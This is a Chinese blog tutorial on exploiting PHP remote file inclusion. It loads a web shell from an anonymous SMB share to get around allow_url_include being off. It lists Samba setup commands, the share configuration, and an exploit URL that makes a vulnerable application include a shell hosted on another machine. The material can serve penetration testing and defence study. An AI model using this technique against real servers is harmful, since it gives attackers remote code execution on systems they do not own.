使用SMB共享来绕过php远程文件包含的限制执行RFI的利用


Posted in PHP onMay 31, 2019

在这篇博文中,我将为大家演示如何利用PHP应用中的远程文件包含漏洞的技术。我们将绕过php远程文件包含的限制,并执行RFI的利用,即使PHP环境被配置为不包含来自远程HTTP/FTP URL的文件。

PHP 和 SMB 共享文件访问

在PHP配置文件中,“allow_url_include”wrapper默认设置为“Off”,指示PHP不加载远程HTTP或FTP URL,从而防止远程文件包含攻击。但是,即使“allow_url_include”和“allow_url_fopen”都设置为“Off”,PHP也不会阻止加载SMB URL。而这就极有可能被滥用来从SMB共享加载远程托管的PHP Web shell。

攻击场景概述

当易受攻击的PHP应用程序代码尝试从受攻击者控制的SMB共享加载PHP Web shell时,SMB共享应允许访问该文件。攻击者需要在其上配置具有匿名浏览访问权限的SMB服务器。因此,一旦易受攻击的应用程序尝试从SMB共享访问PHP Web shell,SMB服务器将不会要求任何的凭据,易受攻击的应用程序将包含Web shell的PHP代码。

首先,我重新配置了PHP环境,并在php.in i文件中禁用了“allow-url-fopen”和“allow-url-include”。之后,配置了具有匿名浏览访问的SMB服务器。一旦SMB共享准备就绪,我们就可以利用易受攻击的应用程序了。

PHP 环境设置

将托管易受攻击代码的机器上的“allow_url_fopen”和“allow_url_include”设置为“Off”

以下是版本为“5.5.11”的PHP当前配置截图:

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

在继续下一步之前,让我们确保当我们尝试访问HTTP上托管的Web shell时,PHP代码不允许远程文件包含。

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

可以看到,当我试图从远程主机包含PHP Web shell时,应用程序抛出错误并且没有包含远程文件。

使用匿名浏览访问配置 Samba 服务器(Linux 机器)
使用以下命令安装Samba服务器:

apt-get install samba创建SMB共享目录:

mkdir /var/www/html/pub/

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

配置新创建的SMB共享目录的权限:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

运行以下命令,删除SAMBA服务器配置文件的默认内容。

echo > /etc/samba/smb.conf将以下内容添加到/etc/samba/smb.conf文件。

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555

force user = nobody现在,重启SAMBA服务器以使配置文件/etc/samba/smb.conf中的新配置生效。

service smbd restart成功重启SAMBA服务器后,尝试访问SMB共享并确保SAMBA服务器不要求提供凭据。

在本例中,SAMBA服务器IP为192.168.0.3,我需要访问Windows文件浏览器中的SMB共享,如下:

\\192.168.0.3\ 

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

在 SMB 共享中托管 PHP Web shell

太棒了!可以访问smb共享,并显示目录“ica”存在。

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

现在,将PHP shell托管在目录“/var/www/html/pub”中,该目录为smb共享目录“ica”。

成功托管PHP shell后,我们使用Windows文件浏览器访问SMB共享目录“ica”。

\\192.168.0.3\ica\可以看到php shell存在于smb共享目录中,在本例中为box.php文件。

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

利用文件包含易受攻击的参数
让我们使用这个PHP shell SMB链接,以及易受攻击的php代码浏览它。

http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.phpPHP易受攻击的代码从SMB共享中获取了web shell,并在应用程序服务器上执行了代码\m/。我们已经绕过了php远程文件包含的限制,并包含了托管在远程主机上的Web shell。

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

总结

以上所述是小编给大家介绍的使用SMB共享来绕过php远程文件包含的限制执行RFI的利用,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持!

PHP 相关文章推荐
php at(@)符号的用法简介
Jul 11 PHP
php旋转图片90度的方法
Nov 07 PHP
PHP中Header使用的HTTP协议及常用方法小结
Nov 04 PHP
php中常见的sql攻击正则表达式汇总
Nov 06 PHP
分享最受欢迎的5款PHP框架
Nov 27 PHP
php中动态变量用法实例
Jun 10 PHP
使用URL传输SESSION信息
Jul 14 PHP
php实现xml与json之间的相互转换功能实例
Jul 07 PHP
Zend Framework入门教程之Zend_Session会话操作详解
Dec 08 PHP
php使用自定义函数实现汉字分割替换功能示例
Jan 30 PHP
Laravel多域名下字段验证的方法
Apr 04 PHP
PHP 实现重载
Mar 09 PHP
PHP使用ActiveMQ实现消息队列的方法详解
May 31 #PHP
php中的buffer缓冲区用法分析
May 31 #PHP
PHP实现基于状态的责任链审批模式详解
May 31 #PHP
Laravel框架实现调用百度翻译API功能示例
May 30 #PHP
Laravel框架学习笔记之批量更新数据功能
May 30 #PHP
PHP实现的微信公众号扫码模拟登录功能示例
May 30 #PHP
PHP使用PDO创建MySQL数据库、表及插入多条数据操作示例
May 30 #PHP
You might like
星际原理概述
2020/03/04 星际争霸
多文件上传的例子
2006/10/09 PHP
Wordpress php 分页代码
2009/10/21 PHP
PHP 5.3新特性命名空间规则解析及高级功能
2010/03/11 PHP
php实现仿写CodeIgniter的购物车类
2015/07/29 PHP
ThinkPHP在Cli模式下使用模板引擎的方法
2015/09/25 PHP
PHP+Ajax实现的检测用户名功能简单示例
2019/02/12 PHP
详解javascript数组去重问题
2015/11/06 Javascript
详解AngularJS中的filter过滤器用法
2016/01/04 Javascript
js检测离开或刷新页面时表单数据是否更改的方法
2016/08/02 Javascript
深入理解javascript函数参数与闭包
2016/12/12 Javascript
Vue服务器渲染Nuxt学习笔记
2018/01/31 Javascript
微信小程序wx.uploadfile 本地文件转base64的实现代码
2018/06/28 Javascript
使用FormData实现上传多个文件
2018/12/04 Javascript
使用RxJS更优雅地进行定时请求详析
2019/06/02 Javascript
Python3中的最大整数和最大浮点数实例
2019/07/09 Python
详解python中的index函数用法
2019/08/06 Python
Django使用uwsgi部署时的配置以及django日志文件的处理方法
2019/08/30 Python
django 中使用DateTime常用的时间查询方式
2019/12/03 Python
Django ValuesQuerySet转json方式
2020/03/16 Python
jupyter 使用Pillow包显示图像时inline显示方式
2020/04/24 Python
python安装第三方库如xlrd的方法
2020/10/31 Python
让IE支持CSS3的不完全兼容方案
2014/09/19 HTML / CSS
美国最大的无人机经销商:DroneNerds
2018/03/20 全球购物
Kangol帽子官网:坎戈尔袋鼠
2018/09/26 全球购物
英国第一独立滑雪板商店:The Snowboard Asylum
2020/01/16 全球购物
C#笔试题
2015/07/14 面试题
中学生操行评语
2014/04/24 职场文书
反邪教警示教育方案
2014/05/13 职场文书
公司贷款承诺书
2014/05/30 职场文书
安全标语口号
2014/06/09 职场文书
拓展训练激励口号
2014/06/17 职场文书
解除劳动合同协议书(样本)
2014/10/02 职场文书
医生个人自我剖析材料
2014/10/08 职场文书
css display table 自适应高度、宽度问题的解决
2021/05/07 HTML / CSS
2021年国产动漫公司排行前十名,玄机科技上榜,第二推出过铠甲勇士
2022/03/18 杂记